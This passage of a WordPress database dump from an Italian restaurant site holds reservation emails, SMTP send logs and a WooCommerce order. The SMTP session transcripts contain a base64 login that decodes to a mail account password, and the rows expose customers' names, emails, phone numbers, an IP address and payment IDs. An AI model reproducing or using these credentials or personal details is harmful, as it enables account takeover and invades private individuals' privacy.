3472781881\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno,\r\nVorrei prenotare per 2 persone la cena di sabato 1 agosto alle 20, possibilmente sulla spiaggia.\r\nGrazie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21272,1047,'original_headers','From: Silvia Cassanelli <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: silvia.cassanelli78@gmail.com\n'),(21273,1047,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 22 Jul 2020 07:05:05 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Silvia Cassanelli <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: silvia.cassanelli78@gmail.com\r\nMessage-Id: <f145fafa153bef0d51c15947d47af7ef@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Wed, 22 Jul 2020 11:05:05 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Silvia Cassanelli <silvia.cassanelli78@gmail.com>=0ATelefono: 347278=\r\n1881=0AOggetto: Prenotazione=0A=0ACorpo del messaggio:=0ABuongiorno,=0D=\r\n=0AVorrei prenotare per 2 persone la cena di sabato 1 agosto alle 20, po=\r\nssibilmente sulla spiaggia.=0D=0AGrazie.=0A=0AAccettato=0A=0A--=0AQuesta=\r\n e-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (http=\r\ns://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1jyCYb-0003c8-9D\r\n'),(21274,1048,'success','1'),(21275,1048,'from_header','ristorante a Riccione <webmaster@baldisserri.com>'),(21276,1048,'to_header','fabio1167@gmail.com'),(21277,1048,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21278,1048,'original_to','fabio1167@gmail.com'),(21279,1048,'original_subject','Conferma d\'iscrizione'),(21280,1048,'original_message','<!doctype html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:v=\"urn:schemas-microsoft-com:vml\" xmlns:o=\"urn:schemas-microsoft-com:office:office\">\n    <head>\n        <title>Per favore conferma la tua iscrizione</title>\n        <!--[if !mso]><!-- -->\n        <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n            <!--<![endif]-->\n            <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n                <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n                    <style type=\"text/css\">\n                        #outlook a { padding: 0; }\n                        .ReadMsgBody { width: 100%; }\n                        .ExternalClass { width: 100%; }\n                        .ExternalClass * { line-height:100%; }\n                        body { margin: 0; padding: 0; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }\n                        table, td { border-collapse:collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; }\n                        img { border: 0; height: auto; line-height: 100%; outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; }\n                        p { display: block; margin: 13px 0; }\n                    </style>\n                    <!--[if !mso]><!-->\n                    <style type=\"text/css\">\n                        @media only screen and (max-width:480px) {\n                            @-ms-viewport { width:320px; }\n                            @viewport { width:320px; }\n                        }\n                    </style>\n                    <!--<![endif]-->\n                    <!--[if mso]>\n                    <xml>\n                      <o:OfficeDocumentSettings>\n                        <o:AllowPNG/>\n                        <o:PixelsPerInch>96</o:PixelsPerInch>\n                      </o:OfficeDocumentSettings>\n                    </xml>\n                    <![endif]-->\n                    <!--[if lte mso 11]>\n                    <style type=\"text/css\">\n                      .outlook-group-fix {\n                        width:100% !important;\n                      }\n                    </style>\n                    <![endif]-->\n                    <style type=\"text/css\">\n                        @media only screen and (min-width:480px) {\n                            .mj-column-per-100 { width:100%!important; }\n                        }\n                    </style>\n                    </head>\n                    <body style=\"background: #F4F4F4;\">\n\n                        <div class=\"mj-container\" style=\"background-color:#F4F4F4;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;padding-bottom:0px;padding-top:0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"word-wrap:break-word;font-size:0px;\"><div style=\"font-size:1px;line-height:40px;white-space:nowrap;\"> </div></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]-->\n                            <!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;background:#ffffff;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;background:#ffffff;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\">\n                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\">\n                                                        <tbody>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <h1 style=\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif; font-size: 28px; font-weight: normal; line-height: 32px;\"><b><span style=\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione</span></b></h1>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <p style=\"font-size: 15px; margin: 10px 0;\">\n                                                                            Per ricevere le newsletter a partire da <a href=\"https://www.ristorantesolymar.it\" target=\"_blank\">https://www.ristorantesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsante:\n                                                                            <!--                                                        To receive newsletters from: \n                                                                                                                                    <a target=\"_blank\" href=\"https://www.ristorantesolymar.it\" style=\"color: #00a6f9; text-decoration: underline; text-decoration: none;\">\n                                                                                                                                        <span style=\"color:#00a6f9\">https://www.ristorantesolymar.it</span>\n                                                                                                                                    </a>, please confirm your subscription by clicking the following button. -->\n                                                                        </p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;\" align=\"left\">\n                                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:separate;\" align=\"left\" border=\"0\">\n                                                                        <tbody>\n                                                                            <tr>\n                                                                                <td style=\"border:none;border-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px;\" align=\"center\" valign=\"middle\" bgcolor=\"#00a6f9\">\n                                                                                    <a href=\"https://www.ristorantesolymar.it?subscription_email=fabio1167%40gmail.com&subscription_locale=it_IT&list_id=22514&thanks_id=0&widget_id=wp_mailjet_subscribe_widget-2&mj_sub_token=412ab79c28dccf7fb2cf40edaa456a39646d4241\" style=\"text-decoration:none;background:#00a6f9;color:#ffffff;font-family:Arial, sans-serif;font-size:16px;font-weight:normal;line-height:120%;text-transform:none;margin:0px;\"><b>Sì, voglio iscrivermi a questa lista</b></a>\n                                                                                </td>\n                                                                            </tr>\n                                                                        </tbody>\n                                                                    </table>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"word-wrap:break-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px;\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">\n                                                                        <p style=\"font-size: 15px; margin: 10px 0;\">Se hai ricevuto questa e-mail per errore o non vuoi più iscriverti, semplicemente ignora questo messaggio.</p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                        </tbody>\n                                                    </table>\n                                                </div><!--[if mso | IE]>\n                        </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]-->\n                            <!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px;\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px;mso-line-height-rule:exactly;\">\n                            <![endif]--><div style=\"margin:0px auto;max-width:600px;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;\"><!--[if mso | IE]>\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px;\">\n                            <![endif]--><div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;display:inline-block;direction:ltr;font-size:13px;text-align:left;width:100%;\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"word-wrap:break-word;font-size:0px;\"><div style=\"font-size:1px;line-height:40px;white-space:nowrap;\"> </div></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></td></tr></tbody></table></div><!--[if mso | IE]>\n                            </td></tr></table>\n                            <![endif]--></div>\n                    </body>\n                    </html>'),(21281,1048,'original_headers','[\"From: Sol Y Mar, ristorante a Riccione <webmaster@baldisserri.com>\"]'),(21282,1048,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n                          <td style=3D\"line-height:0px;font-size:0px;mso=\r\n-line-height-rule:exactly;\">=0A                            <![endif]--><=\r\ndiv style=3D\"margin:0px auto;max-width:600px;background:#ffffff;\"><table=\r\n role=3D\"presentation\" cellpadding=3D\"0\" cellspacing=3D\"0\" style=3D\"font=\r\n-size:0px;width:100%;background:#ffffff;\" align=3D\"center\" border=3D\"0\">=\r\n<tbody><tr><td style=3D\"text-align:center;vertical-align:top;direction:l=\r\ntr;font-size:0px;padding:20px 0px;\"><!--[if mso | IE]>=0A              =\r\n              <table role=3D\"presentation\" border=3D\"0\" cellpadding=3D\"0=\r\n\" cellspacing=3D\"0\">=0A                              <tr>=0A           =\r\n                     <td style=3D\"vertical-align:top;width:600px;\">=0A =\r\n                           <![endif]--><div class=3D\"mj-column-per-100 o=\r\nutlook-group-fix\" style=3D\"vertical-align:top;display:inline-block;direc=\r\ntion:ltr;font-size:13px;text-align:left;width:100%;\">=0A               =\r\n                                     <table role=3D\"presentation\" cellpa=\r\ndding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" border=3D\"0\">=0A          =\r\n                                              <tbody>=0A               =\r\n                                             <tr>=0A                   =\r\n                                             <td style=3D\"word-wrap:brea=\r\nk-word;font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20=\r\npx;\" align=3D\"left\">=0A                                                =\r\n                    <div style=3D\"cursor:auto;color:#5e6977;font-family:=\r\nArial, sans-serif;font-size:13px;line-height:22px;text-align:left;\">=0A=\r\n                                                                       =\r\n <h1 style=3D\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif;=\r\n font-size: 28px; font-weight: normal; line-height: 32px;\"><b><span styl=\r\ne=3D\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione=\r\n</span></b></h1>=0A                                                    =\r\n                </div>=0A                                              =\r\n                  </td>=0A                                             =\r\n               </tr>=0A                                                =\r\n            <tr>=0A                                                    =\r\n            <td style=3D\"word-wrap:break-word;font-size:0px;padding:10px=\r\n 25px;padding-top:0px;padding-bottom:0px;\" align=3D\"left\">=0A          =\r\n                                                          <div style=3D\"=\r\ncursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;l=\r\nine-height:22px;text-align:left;\">=0A                                  =\r\n                                      <p style=3D\"font-size: 15px; margi=\r\nn: 10px 0;\">=0A                                                        =\r\n                    Per ricevere le newsletter a partire da <a href=3D\"h=\r\nttps://www.ristorantesolymar.it\" target=3D\"_blank\">https://www.ristorant=\r\nesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsa=\r\nnte:=0A                                                                =\r\n            <!--                                                       =\r\n To receive newsletters from: =0A                                      =\r\n                                                                       =\r\n                       <a target=3D\"_blank\" href=3D\"https://www.ristoran=\r\ntesolymar.it\" style=3D\"color: #00a6f9; text-decoration: underline; text-=\r\ndecoration: none;\">=0A                                                 =\r\n                                                                       =\r\n                <span style=3D\"color:#00a6f9\">https://www.ristorantesoly=\r\nmar.it</span>=0A                                                       =\r\n                                                                       =\r\n      </a>, please confirm your subscription by clicking the following b=\r\nutton.=C2=A0-->=0A                                                     =\r\n                   </p>=0A                                             =\r\n                       </div>=0A                                       =\r\n                         </td>=0A                                      =\r\n                      </tr>=0A                                         =\r\n                   <tr>=0A                                             =\r\n                   <td style=3D\"word-wrap:break-word;font-size:0px;paddi=\r\nng:10px 25px;\" align=3D\"left\">=0A                                      =\r\n                              <table role=3D\"presentation\" cellpadding=\r\n=3D\"0\" cellspacing=3D\"0\" style=3D\"border-collapse:separate;\" align=3D\"le=\r\nft\" border=3D\"0\">=0A                                                   =\r\n                     <tbody>=0A                                        =\r\n                                    <tr>=0A                            =\r\n                                                    <td style=3D\"border:=\r\nnone;border-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px;\" ali=\r\ngn=3D\"center\" valign=3D\"middle\" bgcolor=3D\"#00a6f9\">=0A                =\r\n                                                                    <a h=\r\nref=3D\"https://www.ristorantesolymar.it?subscription_email=3Dfabio1167%4=\r\n0gmail.com&subscription_locale=3Dit_IT&list_id=3D22514&thanks_id=3D0&wid=\r\nget_id=3Dwp_mailjet_subscribe_widget-2&mj_sub_token=3D412ab79c28dccf7fb2=\r\ncf40edaa456a39646d4241\" style=3D\"text-decoration:none;background:#00a6f9=\r\n;color:#ffffff;font-family:Arial, sans-serif;font-size:16px;font-weight:=\r\nnormal;line-height:120%;text-transform:none;margin:0px;\"><b>S=C3=AC, vog=\r\nlio iscrivermi a questa lista</b></a>=0A                               =\r\n                                                 </td>=0A              =\r\n                                                              </tr>=0A =\r\n                                                                       <=\r\n/tbody>=0A                                                             =\r\n       </table>=0A                                                     =\r\n           </td>=0A                                                    =\r\n        </tr>=0A                                                       =\r\n     <tr>=0A                                                           =\r\n     <td style=3D\"word-wrap:break-word;font-size:0px;padding:10px 25px;p=\r\nadding-top:0px;padding-bottom:0px;\" align=3D\"left\">=0A                 =\r\n                                                   <div style=3D\"cursor:=\r\nauto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-hei=\r\nght:22px;text-align:left;\">=0A                                         =\r\n                               <p style=3D\"font-size: 15px; margin: 10px=\r\n 0;\">Se hai ricevuto questa e-mail per errore o non vuoi pi=C3=B9 iscriv=\r\nerti, semplicemente ignora questo messaggio.</p>=0A                    =\r\n                                                </div>=0A              =\r\n                                                  </td>=0A             =\r\n                                               </tr>=0A                =\r\n                                        </tbody>=0A                    =\r\n                                </table>=0A                            =\r\n                    </div><!--[if mso | IE]>=0A                        <=\r\n/td></tr></table>=0A                            <![endif]--></td></tr></=\r\ntbody></table></div><!--[if mso | IE]>=0A                            </t=\r\nd></tr></table>=0A                            <![endif]-->=0A          =\r\n                  <!--[if mso | IE]>=0A                            <tabl=\r\ne role=3D\"presentation\" border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\"=\r\n width=3D\"600\" align=3D\"center\" style=3D\"width:600px;\">=0A             =\r\n                 <tr>=0A                                <td style=3D\"lin=\r\ne-height:0px;font-size:0px;mso-line-height-rule:exactly;\">=0A          =\r\n                  <![endif]--><div style=3D\"margin:0px auto;max-width:60=\r\n0px;\"><table role=3D\"presentation\" cellpadding=3D\"0\" cellspacing=3D\"0\" s=\r\ntyle=3D\"font-size:0px;width:100%;\" align=3D\"center\" border=3D\"0\"><tbody>=\r\n<tr><td style=3D\"text-align:center;vertical-align:top;direction:ltr;font=\r\n-size:0px;padding:20px 0px 20px 0px;\"><!--[if mso | IE]>=0A            =\r\n                <table role=3D\"presentation\" border=3D\"0\" cellpadding=3D=\r\n\"0\" cellspacing=3D\"0\">=0A                              <tr>=0A         =\r\n                       <td style=3D\"vertical-align:top;width:600px;\">=0A=\r\n                            <![endif]--><div class=3D\"mj-column-per-100=\r\n outlook-group-fix\" style=3D\"vertical-align:top;display:inline-block;dir=\r\nection:ltr;font-size:13px;text-align:left;width:100%;\"><table role=3D\"pr=\r\nesentation\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" border=3D=\r\n\"0\"><tbody><tr><td style=3D\"word-wrap:break-word;font-size:0px;\"><div st=\r\nyle=3D\"font-size:1px;line-height:40px;white-space:nowrap;\">=C2=A0</div><=\r\n/td></tr></tbody></table></div><!--[if mso | IE]>=0A                   =\r\n         </td></tr></table>=0A                            <![endif]--></=\r\ntd></tr></tbody></table></div><!--[if mso | IE]>=0A                    =\r\n        </td></tr></table>=0A                            <![endif]--></d=\r\niv>=0A                    </body>=0A                    </html>\r\n.\r\n250 OK id=1jz3mg-0007XI-7l\r\n'),(21283,1050,'success','1'),(21284,1050,'from_header','Mirella Di Simone <notifiche@ristorantesolymar.it>'),(21285,1050,'to_header','teosphone@gmail.com'),(21286,1050,'reply_to_header','disimirella@hotmail.com'),(21287,1050,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21288,1050,'original_to','teosphone@gmail.com'),(21289,1050,'original_subject','Da sito Sol Y Mar: \"Prenotazione tavolo\"'),(21290,1050,'original_message','Da: Mirella Di Simone <disimirella@hotmail.com>\nTelefono: 3356693807\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nVorrei prenotare un tavolo per 3 persone x la sera del 10 agosto 2020\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21291,1050,'original_headers','From: Mirella Di Simone <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: disimirella@hotmail.com\n'),(21292,1050,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 30 Jul 2020 17:32:04 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.12 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Mirella Di Simone <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: disimirella@hotmail.com\r\nMessage-Id: <206d39f5494ba27bc5d85ad498e64e96@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione tavolo\"\r\nDate: Thu, 30 Jul 2020 21:32:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Mirella Di Simone <disimirella@hotmail.com>=0ATelefono: 3356693807=\r\n=0AOggetto: Prenotazione tavolo=0A=0ACorpo del messaggio:=0AVorrei preno=\r\ntare un tavolo per 3 persone x la sera del 10 agosto 2020=0A=0AAccettato=\r\n=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto s=\r\nu Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1k1G9k-0007kw-Qj\r\n'),(21293,1051,'_order_key','wc_order_iR4flYR2Jlc0n'),(21294,1051,'_customer_user','0'),(21295,1051,'_payment_method','paypal'),(21296,1051,'_payment_method_title','PayPal'),(21297,1051,'_customer_ip_address','87.13.114.252'),(21298,1051,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15'),(21299,1051,'_created_via','checkout'),(21300,1051,'_cart_hash','9f534324e8efc1aed7a90542909b5bae'),(21301,1051,'_billing_first_name','Gaia'),(21302,1051,'_billing_last_name','Marchesini'),(21303,1051,'_billing_email','gaia.marchesini@gmail.com'),(21304,1051,'_billing_phone','3398328956'),(21305,1051,'_order_currency','EUR'),(21306,1051,'_cart_discount','0'),(21307,1051,'_cart_discount_tax','0'),(21308,1051,'_order_shipping','0.00'),(21309,1051,'_order_shipping_tax','0'),(21310,1051,'_order_tax','0'),(21311,1051,'_order_total','125.00'),(21312,1051,'_order_version','4.3.1'),(21313,1051,'_prices_include_tax','no'),(21314,1051,'_billing_address_index','Gaia Marchesini        gaia.marchesini@gmail.com 3398328956'),(21315,1051,'_shipping_address_index','        '),(21316,1051,'is_vat_exempt','no'),(21317,1051,'Quanti adulti?','1'),(21318,1051,'Numero bambini fino a 6 anni','0'),(21319,1051,'Numero ragazzi fino a 14 anni','0'),(21320,1051,'Numero ragazzi dai 15 anni in su','0'),(21321,1051,'Files attached','[]'),(21322,1051,'Payment type','instant'),(21323,1051,'_transaction_id','3L636037PN2637254'),(21324,1051,'_paypal_status','completed'),(21325,1051,'PayPal Transaction Fee','4.60'),(21326,1051,'_date_paid','1596546178'),(21327,1051,'_paid_date','2020-08-04 15:02:58'),(21328,1051,'_download_permissions_granted','yes'),(21329,1051,'_recorded_sales','yes'),(21330,1051,'_recorded_coupon_usage_counts','yes'),(21331,1051,'_order_stock_reduced','yes'),(21332,1052,'success','1'),(21333,1052,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21334,1052,'to_header','notifiche@ristorantesolymar.it'),(21335,1052,'reply_to_header','Gaia Marchesini <gaia.marchesini@gmail.com>'),(21336,1052,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21337,1052,'original_to','notifiche@ristorantesolymar.it'),(21338,1052,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1051) - 4 Agosto 2020'),(21339,1052,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Gaia Marchesini:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1051&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1051]</a> (4 Agosto 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; 